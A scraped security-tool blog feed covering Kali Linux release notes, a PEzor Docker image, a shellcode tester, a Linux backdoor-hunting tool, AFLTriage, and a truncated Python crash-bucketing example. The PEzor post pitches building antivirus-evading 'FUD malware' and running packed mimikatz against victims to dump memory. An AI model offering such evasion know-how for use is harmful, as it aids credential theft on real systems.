src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiTtZYI97lcNISgbv6KTnLdshFnFSINgQKZz4t-_pVsVzx0nu3jsDwgrMFpj_PI4qQzy-hB6MN13RyHlyU7Nxz0oWbOtOJjuwINGmxsaXLbf2-a-zvJEcU8omMaPzEwWWHW9Uz_5vuyngv36ADG843jjC2AsWp4CT7T6HrfkliCtjmyVRvdDmmM_MO/w640-h334/banner-2022.2-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p>
Time for another Kali Linux release! – Kali Linux 2022.2. This release has various impressive updates.<span><a name='more'></a></span><div><br /></div><div>
<p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2022-1-release/">2022.1 release from February 2022</a> is:</p><ul><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#gnome-42"><strong>GNOME 42</strong></a> - Major release update of the popular desktop environment</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#kde-plasma-524"><strong>KDE Plasma 5.24</strong></a> - Version bump with a more polished experience</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#other-desktop-enhancements"><strong>Multiple desktop enhancements</strong></a>
- Disabled motherboard beep on Xfce, alternative panel layout for ARM,
better support for VirtualBox shared folders, and lots more</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#tweaks-for-the-terminal"><strong>Tweaks for the terminal</strong></a> - Enhanced Zsh <code>syntax-highlighting</code>, inclusion of <code>Python3-pip</code> and <code>Python3-virtualenv</code> by default</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#hollywood-activate--kali-screensaver-april-fools"><strong>April fools - Hollywood mode</strong></a> - Awesome screensaver</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#kali-unkaputtbar"><strong>Kali Unkaputtbar</strong></a> - BTRFS snapshot support for Kali</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#win-kex-31"><strong>Win-KeX 3.1</strong></a> - sudo support for GUI apps</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#new-tools-in-kali"><strong>New tools</strong></a> - Various new tools added</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#kali-nethunter-updates"><strong>WPS attacks in Kali NetHunter</strong></a> - Added WPS attacks tab to the NetHunter app</li></ul><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2022-2-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2022.2</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-38604361385776623652022-05-06T08:30:00.001-04:002022-05-06T08:30:00.274-04:00PEzor-Docker - With The Help Of This Docker Image, You Can Easily Access PEzor On Your System!<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhHsckeiF1v5WX0Uu9SCE_OM4fNbfFt7YjLzq62-RCB3tael1hB5SScgVryMUgGPZ00LcncujG10PTQNg31w0fltsmos2YfEHvvFkCL6roF5LGu4vEqUIpOXnb_QDAl_eG9JVL9YUaRGQvpKVXV1pr-AS0RmpTmJNS1lsoJ6P-4RJ_EjfeSyqDVCYPJ" style="text-align: left;"><img alt="" border="0" height="352" id="BLOGGER_PHOTO_ID_7093768154029607282" src="https://blogger.googleusercontent.com/img/a/AVvXsEhHsckeiF1v5WX0Uu9SCE_OM4fNbfFt7YjLzq62-RCB3tael1hB5SScgVryMUgGPZ00LcncujG10PTQNg31w0fltsmos2YfEHvvFkCL6roF5LGu4vEqUIpOXnb_QDAl_eG9JVL9YUaRGQvpKVXV1pr-AS0RmpTmJNS1lsoJ6P-4RJ_EjfeSyqDVCYPJ=w640-h352" width="640" /></a></p> <p dir="auto"><br /></p> <p dir="auto">With the help of this <a href="https://www.kitploit.com/search/label/Kali%20Linux" target="_blank" title="kali linux">kali linux</a> image, you can easily <a href="https://www.kitploit.com/search/label/Access" target="_blank" title="access">access</a> PEzor on your system!</p> <p dir="auto">Basically, this image is built from the kalilinux/kali-rolling image and then the PEzor shellcode and PE <a href="https://www.kitploit.com/search/label/Packer" target="_blank" title="packer">packer</a> is installed on top of it. Sometimes, it's vital to have access to PEzor, specially in a post exploit phase, but installing it on a host or a VM is a time-consuming task due to the dependencies that are required. Having said that, this docker image is created to solve this problem and provide a quick way to access PEzor.</p> <p dir="auto">P.S. 
All the credits for the wonderful PEzor tool are reserved for <a href="https://github.com/phra" rel="nofollow" target="_blank" title="@phra">@phra</a>.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto">Disclaimer</h1> <p dir="auto">This docker image is only for educational purposes and ethical uses! Any misuse of this image is entirely at your own risk.</p> <h1 dir="auto">About PEzor</h1> <p dir="auto">With the help of this incredible tool, you can create FUD malware that is capable of <a href="https://www.kitploit.com/search/label/Bypassing" target="_blank" title="bypassing">bypassing</a> most of the well-known AVs. For instance, you can pack the "mimikatz" executable file with the help of PEzor and then run it against a victim's system for a full memory dump without any problem!</p> <h1 dir="auto">How to use</h1> <p dir="auto"><em><b>NOTE: You need to have docker installed on your system.</b></em></p> <div><pre class="notranslate"><code class="notranslate">docker pull 4d0niis/pezor_included_kali:1.0</code></pre></div> <div><pre class="notranslate"><code class="notranslate">docker run -it 4d0niis/pezor_included_kali:1.0 /bin/bash</code></pre></div> <div><pre class="notranslate"><code class="notranslate">PEzor &lt;COMMANDS&gt;</code></pre></div> <h1 dir="auto">References</h1> <p dir="auto"><a href="https://hub.docker.com/r/4d0niis/pezor_included_kali" rel="nofollow" target="_blank" title="https://hub.docker.com/r/4d0niis/pezor_included_kali">https://hub.docker.com/r/4d0niis/pezor_included_kali</a></p> <p dir="auto"><a href="https://github.com/phra/PEzor" rel="nofollow" target="_blank" title="https://github.com/phra/PEzor">https://github.com/phra/PEzor</a></p> <p dir="auto"><a href="https://hub.docker.com/r/kalilinux/kali-rolling" rel="nofollow" target="_blank" title="https://hub.docker.com/r/kalilinux/kali-rolling">https://hub.docker.com/r/kalilinux/kali-rolling</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/4D0niiS/PEzor-Docker" rel="nofollow" target="_blank" title="Download PEzor-Docker">Download PEzor-Docker</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-12680483986125924422022-02-16T01:28:00.001-03:002022-02-16T01:28:17.791-03:00Kali Linux 2022.1 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEh6iTYLXs1cdlD8_xPVErU9WeNhKR8btBxU7jmXBX5YjtdnSFy4STQW7uD3rmbGe9k8nJPDpojqWqUAm1kMhzrik87SVPNfN-CEYpDkgET_UC6FEawMOozkRmgCYZNLEPF_mTUyyyEuwxiQJCrODs9UV5fyQw3JP1_jgd9bxJ6XDjzW0dR-x9oEM0cz=s1200" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/a/AVvXsEh6iTYLXs1cdlD8_xPVErU9WeNhKR8btBxU7jmXBX5YjtdnSFy4STQW7uD3rmbGe9k8nJPDpojqWqUAm1kMhzrik87SVPNfN-CEYpDkgET_UC6FEawMOozkRmgCYZNLEPF_mTUyyyEuwxiQJCrODs9UV5fyQw3JP1_jgd9bxJ6XDjzW0dR-x9oEM0cz=w640-h334" width="640" /></a></div><p><br /></p><p></p>
Time for another Kali Linux release! – Kali Linux 2022.1. This release has various impressive updates.<span><a name='more'></a></span><div><br /></div><div>
<p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2021-4-release/">2021.4 release from December 2021</a> is:</p>
<ul>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#visual-refresh-theme-updates">Visual Refresh</a></strong> - Updated wallpapers and GRUB theme</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#shell-prompt-changes">Shell Prompt Changes</a></strong> - Visual improvements to improve readability when copying code</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#refreshed-browser-landing-page">Refreshed Browser Landing Page</a></strong> - Firefox and Chromium homepage has had a makeover to help you access everything Kali you need</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#kali-everything-image-everything-in-one-place">Kali Everything Image</a></strong> - An all-packages-in-one solution now available to download</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#kali-tweaks-legacy-ssh-made-easy">Kali-Tweaks Meets SSH</a></strong> - Connect to old SSH servers using legacy SSH protocols and ciphers</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#vmware-i3-improvements">VMware i3 Improvements</a></strong> - Host-guest features properly work now on i3</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#accessibility-talk-to-me">Accessibility Features</a></strong> - Speech synthesis is back in the Kali installer</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#new-tools-in-kali">New Tools</a></strong> - Various new tools added, many from ProjectDiscovery!</li></ul><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2022-1-release/" target="_blank">here</a>.</b><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/downloads/" rel="nofollow" target="_blank" title="Download Kali Linux 2022.1">Download Kali Linux 2022.1</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19965173892570368532022-02-15T17:30:00.025-03:002022-02-15T17:30:00.273-03:00Shellcodetester - An Application To Test Windows And Linux Shellcodes<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh359EAhOCA5GJ7ojPG5cU1nXGVd0eq2gIXlEH8IV5sHGWdvVOyiGVgm1kwJn1vWP3q-qV-wI258ED_fzW4a_zgHRTe7HwV9pDqSdUVu2BTpyZlQ5ceVU08S8pwVzIFYQE6lWx4WTklkWIoyFugaZbFlQcXDzeMsvVHKl6QodXpBLdRC4fDVP_Bg3s9=s695" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="323" data-original-width="695" height="298" src="https://blogger.googleusercontent.com/img/a/AVvXsEh359EAhOCA5GJ7ojPG5cU1nXGVd0eq2gIXlEH8IV5sHGWdvVOyiGVgm1kwJn1vWP3q-qV-wI258ED_fzW4a_zgHRTe7HwV9pDqSdUVu2BTpyZlQ5ceVU08S8pwVzIFYQE6lWx4WTklkWIoyFugaZbFlQcXDzeMsvVHKl6QodXpBLdRC4fDVP_Bg3s9=w640-h298" width="640" /></a></div><p style="text-align: center;"><br /></p> <p dir="auto">This tool tests generated shellcodes.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h3 dir="auto">Usage</h3> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh359EAhOCA5GJ7ojPG5cU1nXGVd0eq2gIXlEH8IV5sHGWdvVOyiGVgm1kwJn1vWP3q-qV-wI258ED_fzW4a_zgHRTe7HwV9pDqSdUVu2BTpyZlQ5ceVU08S8pwVzIFYQE6lWx4WTklkWIoyFugaZbFlQcXDzeMsvVHKl6QodXpBLdRC4fDVP_Bg3s9=s695" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="323" data-original-width="695" height="298" src="https://blogger.googleusercontent.com/img/a/AVvXsEh359EAhOCA5GJ7ojPG5cU1nXGVd0eq2gIXlEH8IV5sHGWdvVOyiGVgm1kwJn1vWP3q-qV-wI258ED_fzW4a_zgHRTe7HwV9pDqSdUVu2BTpyZlQ5ceVU08S8pwVzIFYQE6lWx4WTklkWIoyFugaZbFlQcXDzeMsvVHKl6QodXpBLdRC4fDVP_Bg3s9=w640-h298" width="640" /></a></p><p style="text-align: center;"><br /></p> <h3 dir="auto">Example</h3> <p style="text-align: center;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhos2UuZHRXmJOWRoWhK5Qh3vhp6DJi3JLU1nOXH4I5sl0dDHNupYthcmIWa-Ccxb3NS6sbnw4_khUWoVp5HKF_4mvNqW0uKB5B4bXXCjn49Yml1H-eog7E5L4Hv3jwGy0W7o7eDR0On1imVdpxgGFROW7EkeWA7v_k0ZS4YZpLtSAkiijfJv5Q4qnx=s1002" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="176" data-original-width="1002" height="112" src="https://blogger.googleusercontent.com/img/a/AVvXsEhos2UuZHRXmJOWRoWhK5Qh3vhp6DJi3JLU1nOXH4I5sl0dDHNupYthcmIWa-Ccxb3NS6sbnw4_khUWoVp5HKF_4mvNqW0uKB5B4bXXCjn49Yml1H-eog7E5L4Hv3jwGy0W7o7eDR0On1imVdpxgGFROW7EkeWA7v_k0ZS4YZpLtSAkiijfJv5Q4qnx=w640-h112" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhAktm6Whx443Mj9PzCTsrwzW34TC7xIc6lXfRgAEOlCxMqh2eD9N_v0YQ8xH0rVex2wLlqep43IvGlQl4AyCAsU29FA2BF16olaXH6U0o5iWg06bKPwqf-9ABO3LUb4enD_K_If_oN3ckVw9tF0uEhaAfNGCjPm8zP5XASrZ-S62Bfkv6orh068ojo=s695" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="323" data-original-width="695" height="298" src="https://blogger.googleusercontent.com/img/a/AVvXsEhAktm6Whx443Mj9PzCTsrwzW34TC7xIc6lXfRgAEOlCxMqh2eD9N_v0YQ8xH0rVex2wLlqep43IvGlQl4AyCAsU29FA2BF16olaXH6U0o5iWg06bKPwqf-9ABO3LUb4enD_K_If_oN3ckVw9tF0uEhaAfNGCjPm8zP5XASrZ-S62Bfkv6orh068ojo=w640-h298" width="640" /></a></div><p 
style="text-align: center;"><br /></p> <h2 dir="auto">ShellCode Tester Linux</h2> <h3 dir="auto">Installation</h3> <pre><code>git clone https://github.com/helviojunior/shellcodetester.git<br />cd shellcodetester/Linux<br />make<br /></code></pre> <h3 dir="auto">Usage</h3> <p dir="auto">Without break-point:</p> <pre><code>shellcodetester [file.asm]<br /></code></pre> <p dir="auto">With a break-point (INT3), inserted before the generated shellcode:</p> <pre><code>shellcodetester [file.asm] --break-point<br /></code></pre> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/helviojunior/shellcodetester" rel="nofollow" target="_blank" title="Download Shellcodetester">Download Shellcodetester</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-17257641395102196262022-01-09T08:30:00.001-03:002022-01-09T08:30:00.271-03:00RCLocals - Linux Startup Analyzer <p dir="auto" style="text-align: center;"><a href="http://1.bp.blogspot.com/-pZ6n3FAVAyc/Ydg4ky5vksI/AAAAAAAA7ns/ARr2StWdejMHCshLORn4Cninhe_zn8rGACK4BGAYYCw/s1600/RCLocals_1_1-710961.jpeg"><img alt="" border="0" height="242" id="BLOGGER_PHOTO_ID_7050447421438923458" src="http://1.bp.blogspot.com/-pZ6n3FAVAyc/Ydg4ky5vksI/AAAAAAAA7ns/ARr2StWdejMHCshLORn4Cninhe_zn8rGACK4BGAYYCw/w640-h242/RCLocals_1_1-710961.jpeg" width="640" /></a></p><p dir="auto"><br /></p><p dir="auto">Inspired by 'Autoruns' from Sysinternals, RCLocals analyzes all <a href="https://www.kitploit.com/search/label/Linux" target="_blank" 
title="Linux">Linux</a> startup possibilities to find backdoors; it also performs process integrity verification, <a href="https://www.kitploit.com/search/label/Scan" target="_blank" title="scan">scans</a> for <a href="https://www.kitploit.com/search/label/DLL" target="_blank" title="DLL">DLL</a>-injected processes, and much more.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">Things covered:</h2> <ul dir="auto"> <li><strong>List GPG keys trusted by the system</strong></li> <li><strong>Installed Packages</strong></li> <li><strong>File integrity</strong></li> <li><strong>Process integrity</strong> (processes, and libraries loaded into a process, that do not belong to any installed package)</li> <li><strong>Processes with spoofed names</strong> (processes that use <code>prctl()</code> to change the name shown by <code>/bin/ps</code>)</li> <li><strong>CRON entries</strong></li> <li><strong>RC files</strong></li> <li><strong>X system startup files</strong></li> <li><strong>Active Systemd Units</strong></li> <li><strong>Systemd Timer Units</strong></li> <li><strong>tmpfiles.d</strong></li> <li><strong>Linger users</strong></li> </ul> <h2 dir="auto">USAGE</h2> <p dir="auto">For only suspicious information:</p> <pre><code># python3 rclocals.py --triage</code></pre> <p dir="auto">For detailed information:</p> <pre><code># python3 rclocals.py --all</code></pre> <h2 dir="auto">Screenshots</h2> <p dir="auto" style="text-align: center;"><a href="http://1.bp.blogspot.com/-pZ6n3FAVAyc/Ydg4ky5vksI/AAAAAAAA7ns/ARr2StWdejMHCshLORn4Cninhe_zn8rGACK4BGAYYCw/s1600/RCLocals_1_1-710961.jpeg"><img alt="" border="0" height="242" id="BLOGGER_PHOTO_ID_7050447421438923458" 
src="http://1.bp.blogspot.com/-pZ6n3FAVAyc/Ydg4ky5vksI/AAAAAAAA7ns/ARr2StWdejMHCshLORn4Cninhe_zn8rGACK4BGAYYCw/w640-h242/RCLocals_1_1-710961.jpeg" width="640" /></a></p> <p dir="auto" style="text-align: center;"><a href="https://github.com/YJesus/RCLocals/blob/master/screenshots/2.png" rel="nofollow" target="_blank" title="Linux startup analyzer (5)"></a><a href="http://2.bp.blogspot.com/-9lIuUc6YfWQ/Ydg4lLf_5CI/AAAAAAAA7n0/bHhQJT0iefQz-42CDVCiFGDaJ147vggGgCK4BGAYYCw/s1600/RCLocals_2_2-712209.png"><img alt="" border="0" height="576" id="BLOGGER_PHOTO_ID_7050447428041827362" src="http://2.bp.blogspot.com/-9lIuUc6YfWQ/Ydg4lLf_5CI/AAAAAAAA7n0/bHhQJT0iefQz-42CDVCiFGDaJ147vggGgCK4BGAYYCw/w640-h576/RCLocals_2_2-712209.png" width="640" /></a></p> <p dir="auto" style="text-align: center;"><a href="https://github.com/YJesus/RCLocals/blob/master/screenshots/3.png" rel="nofollow" target="_blank" title="Linux startup analyzer (6)"></a><a href="http://1.bp.blogspot.com/-_QyTqgOjcbA/Ydg4lSsB8DI/AAAAAAAA7n8/V1YsW7krWvEQpowzApJ1yFa5A0Yo91QPgCK4BGAYYCw/s1600/RCLocals_3_3-713220.png"><img alt="" border="0" height="356" id="BLOGGER_PHOTO_ID_7050447429971341362" src="http://1.bp.blogspot.com/-_QyTqgOjcbA/Ydg4lSsB8DI/AAAAAAAA7n8/V1YsW7krWvEQpowzApJ1yFa5A0Yo91QPgCK4BGAYYCw/w640-h356/RCLocals_3_3-713220.png" width="640" /></a></p> <p dir="auto" style="text-align: center;"><a href="https://github.com/YJesus/RCLocals/blob/master/screenshots/4.png" rel="nofollow" target="_blank" title="Linux startup analyzer (7)"></a><a href="http://3.bp.blogspot.com/-E1JXfSQ7768/Ydg4lnWy1yI/AAAAAAAA7oE/N3GRJ2rpn9IbQKDFBJ15CFaS_g08ntBiQCK4BGAYYCw/s1600/RCLocals_4_4-714244.png"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7050447435519416098" src="http://3.bp.blogspot.com/-E1JXfSQ7768/Ydg4lnWy1yI/AAAAAAAA7oE/N3GRJ2rpn9IbQKDFBJ15CFaS_g08ntBiQCK4BGAYYCw/w528-h640/RCLocals_4_4-714244.png" width="528" /></a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a 
class="kiploit-download" href="https://github.com/YJesus/RCLocals" rel="nofollow" target="_blank" title="Download RCLocals">Download RCLocals</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-23746862554289839472021-12-09T17:30:00.001-03:002021-12-09T17:30:00.261-03:00AFLTriage - Tool To Triage Crashing Input Files Using A Debugger<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjp-i3LciohjRKXn16O7afv3-f6pkcU54JgRWbOv1Odwb2V40IueJbVwD2s-qRBvKcDmuFnfv1EECjhdSDVGEwqNQudLrSfSy0m7Wv2NAIoRfN9yFitCuCxiTVmV8aApOJ0ozeBPVax8hDZu6w3kcvI7fyrYSrLtqd_PuiS9fXs_F5cfjv4mNhflLunhg=s1440" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1440" height="320" src="https://blogger.googleusercontent.com/img/a/AVvXsEjp-i3LciohjRKXn16O7afv3-f6pkcU54JgRWbOv1Odwb2V40IueJbVwD2s-qRBvKcDmuFnfv1EECjhdSDVGEwqNQudLrSfSy0m7Wv2NAIoRfN9yFitCuCxiTVmV8aApOJ0ozeBPVax8hDZu6w3kcvI7fyrYSrLtqd_PuiS9fXs_F5cfjv4mNhflLunhg=w640-h320" width="640" /></a></div><p><br /></p> <p dir="auto">AFLTriage is a tool to triage crashing input files using a debugger. It is designed to be portable and not require any run-time dependencies, besides libc and an external debugger. 
It supports triaging <a href="https://www.kitploit.com/search/label/Crashes" target="_blank" title="crashes">crashes</a> generated by any program, not just AFL, but recognizes AFL directories specially, hence the name.</p> <p dir="auto">Some notable features include:</p> <ul dir="auto"> <li>Multiple report formats: <a href="https://github.com/quic/AFLTriage/blob/main/src/report/res/test_report_text/asan_stack_bof.txt" rel="nofollow" target="_blank" title="text">text</a>, <a href="https://github.com/quic/AFLTriage/blob/main/src/report/res/test_report_text/asan_stack_bof.json" rel="nofollow" target="_blank" title="JSON">JSON</a>, and <a href="https://github.com/quic/AFLTriage/blob/main/src/report/res/test_report_text/asan_stack_bof.rawjson" rel="nofollow" target="_blank" title="raw">raw</a> <a href="https://www.kitploit.com/search/label/Debugger" target="_blank" title="debugger">debugger</a> JSON</li> <li>Parallel crash triage</li> <li>Crash deduplication</li> <li>Sanitizer report parsing</li> <li>Supports <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> targets with or without symbols/debugging information</li> <li>Source code and variables are annotated in reports for context</li> </ul> <p dir="auto">Currently AFLTriage only supports GDB and has only been tested on Linux C/C++ targets. Note that AFLTriage does not classify crashes by potential exploitability. Accurate exploitability classification is very target- and scenario-specific and is best left to specialized tools and expert analysts.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">Usage</h2> <p dir="auto">Usage of AFLTriage is quite straightforward. 
You need your inputs to triage, an output <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> for reports, and the binary and its arguments to triage.</p> <p dir="auto">Example:</p> <div class="snippet-clipboard-content position-relative overflow-auto"><pre><code>$ afltriage -i fuzzing_directory -o reports ./target_binary --option-one @@<br />AFLTriage v1.0.0<br /><br />[+] GDB is working (GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1 - Python 3.6.9 (default, Jan 26 2021, 15:33:00))<br />[+] Image triage cmdline: "./target_binary --option-one @@"<br />[+] Reports will be output to directory "reports"<br />[+] Triaging AFL directory fuzzing_directory/ (41 files)<br />[+] Triaging 41 testcases<br />[+] Using 24 threads to triage<br />[+] Triaging [41/41 00:00:02] [####################] CRASH: ASAN detected heap-buffer-overflow in buggy_function after a READ leading to SIGABRT (si_signo=6) / SI_TKILL (si_code=-6)<br />[+] Triage stats [Crashes: 25 (unique 12), No crash: 16, Errored: 0]<br /></code></pre></div> <p dir="auto">As with AFL, the <code>@@</code> is replaced with the path of the file to be triaged. 
AFLTriage will take care of the rest.</p> <h2 dir="auto">Building and Running</h2> <p dir="auto">You will need a working Rust build environment. Once you have cargo and rust installed, building and running is simple:</p> <div class="snippet-clipboard-content position-relative overflow-auto"><pre><code>cd afltriage-rs/<br />cargo run --help<br /><br /><compilation><br /><br /> Finished dev [unoptimized + debuginfo] target(s) in 0.33s<br /> Running `target/debug/afltriage --help`<br /><br /><AFLTriage usage><br />...<br /></code></pre></div> <h2 dir="auto">Extended Usage</h2> <div class="snippet-clipboard-content position-relative overflow-auto"><pre><code>afltriage 1.0.0<br />Quickly triage and summarize crashing testcases<br /><br />USAGE:<br /> afltriage -i <input>... -o <output> <command>...<br /><br />OPTIONS:<br /> -i <input>...<br /> A list of paths to a testcase, directory of testcases, AFL directory, and/or directory of AFL directories to<br /> be triaged. Note that this arg takes multiple inputs in a row (e.g. -i input1 input2...) so it cannot be the<br /> last argument passed to AFLTriage -- this is reserved for the command.<br /> -o <output><br /> The output directory for triage report files. Use '-' to print entire reports to console.<br /><br /> -t, --timeout <timeout><br /> The timeout in milliseconds for each testcase to triage. [default: 60000]<br /><br /> -j, --jobs <jobs> <br /> How many threads to use during triage.<br /><br /> --report-formats <report_formats>...<br /> The triage report output formats. Multiple values allowed: e.g. text,json. [default: text] [possible<br /> values: text, json, rawjson]<br /> --bucket-strategy <bucket_strategy><br /> The crash deduplication strategy to use. [default: afltriage] [possible values: none, afltriage,<br /> first_frame, first_frame_raw, first_5_frames, function_names, first_function_name]<br /> --child-output <br /> Include child output in triage reports.<br /><br /> --child-output-lines <child_output_lines><br /> How many lines of program output from the target to include in reports. Use 0 to mean unlimited lines (not<br /> recommended). [default: 25]<br /> --stdin <br /> Provide testcase input to the target via stdin instead of a file.<br /><br /> --profile-only<br /> Perform environment checks, describe the inputs to be triaged, and profile the target binary.<br /><br /> --skip-profile <br /> Skip target profiling before input processing.<br /><br /> --debug <br /> Enable low-level debugging output of triage operations.<br /><br /> -h, --help <br /> Prints help information<br /><br /> -V, --version <br /> Prints version information<br /><br /><br />ARGS:<br /> <command>... <br /> The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or<br /> --stdin. 
Optionally use -- to delimit the start of the command.<br /></code></pre></div> <h2 dir="auto">Related Projects</h2> <ul dir="auto"> <li><a href="https://github.com/jfoote/exploitable" rel="nofollow" target="_blank" title="GDB Exploitable">GDB Exploitable</a> - A big inspiration for AFLTriage</li> <li><a href="https://github.com/bnagy/crashwalk" rel="nofollow" target="_blank" title="Crashwalk">Crashwalk</a></li> <li>afl-collect from <a href="https://github.com/rc0r/afl-utils" rel="nofollow" target="_blank" title="afl-utils">afl-utils</a></li></ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/quic/AFLTriage" rel="nofollow" target="_blank" title="Download AFLTriage">Download AFLTriage</a></span></b></div>Unknownnoreply@blogger.com
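<p dir="auto">The <code>--bucket-strategy</code> values listed in the extended usage above (<code>first_frame</code>, <code>first_frame_raw</code>, <code>first_5_frames</code>, <code>function_names</code>, <code>first_function_name</code>, <code>none</code>) are what turn "Crashes: 25" into "unique 12". The following is an added illustration of how those strategies group the same crashes differently; it is not AFLTriage's code, it does not reproduce the tool's own default <code>afltriage</code> heuristic, and the <code>Frame</code> fields, the runtime-frame skipping and the five backtraces are all constructed assumptions rather than anything taken from a real report.</p>

```python
"""Crash bucketing in the style of AFLTriage's --bucket-strategy option.

Added illustration, not AFLTriage's own code. The backtraces are constructed
and the Frame fields are an assumption about what a debugger-based triage
report exposes (symbol, module, offset, source file and line).
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Frames of the crash machinery rather than the bug. Skipping them is an
# assumed refinement: otherwise every sanitizer abort shares the top frame
# `raise` and collapses into one bucket.
RUNTIME_FRAMES = {"raise", "abort", "__GI_raise", "__GI_abort"}

STRATEGIES = ("none", "first_frame", "first_frame_raw", "first_5_frames",
              "function_names", "first_function_name")


@dataclass(frozen=True)
class Frame:
    function: str   # "??" when the binary carries no symbols
    module: str     # object the frame's PC falls in
    offset: int     # PC offset from that module's base (assumed field)
    file: str = ""  # source file, only with debug info
    line: int = 0


def strip_runtime_frames(bt: List[Frame]) -> List[Frame]:
    """Drop leading abort/raise frames so frame 0 is the faulting frame."""
    frames = list(bt)
    while len(frames) > 1 and frames[0].function in RUNTIME_FRAMES:
        frames.pop(0)
    return frames


def frame_key(frame: Frame, raw: bool = False) -> str:
    """Symbolic key when symbols exist; module+offset when raw or unsymbolized."""
    if raw or frame.function == "??":
        return f"{frame.module}+0x{frame.offset:x}"
    if frame.file:
        return f"{frame.function}@{frame.file}:{frame.line}"
    return frame.function


def bucket_key(bt: List[Frame], strategy: str) -> Optional[str]:
    """Dedup key for one backtrace; None means 'no deduplication'."""
    bt = strip_runtime_frames(bt)
    if strategy == "none":
        return None
    if strategy == "first_frame":
        return frame_key(bt[0])
    if strategy == "first_frame_raw":
        return frame_key(bt[0], raw=True)
    if strategy == "first_5_frames":
        return "|".join(frame_key(f) for f in bt[:5])
    if strategy == "function_names":
        return "|".join(f.function for f in bt)
    if strategy == "first_function_name":
        return bt[0].function
    raise ValueError(f"unknown bucket strategy: {strategy}")


def bucket_crashes(crashes: Dict[str, List[Frame]],
                   strategy: str) -> Dict[str, List[str]]:
    """Map each bucket key to the testcase names that fall into it."""
    buckets: Dict[str, List[str]] = defaultdict(list)
    for name, bt in crashes.items():
        key = bucket_key(bt, strategy)
        buckets[name if key is None else key].append(name)
    return dict(buckets)


def _f(function, file="", line=0, module="target", offset=0):
    return Frame(function, module, offset, file, line)


# Constructed backtraces for five testcases, innermost frame first.
CRASHES: Dict[str, List[Frame]] = {
    "id_000": [_f("raise", module="libc.so.6", offset=0x3e8d0),      # sanitizer abort
               _f("abort", module="libc.so.6", offset=0x3e8e0),
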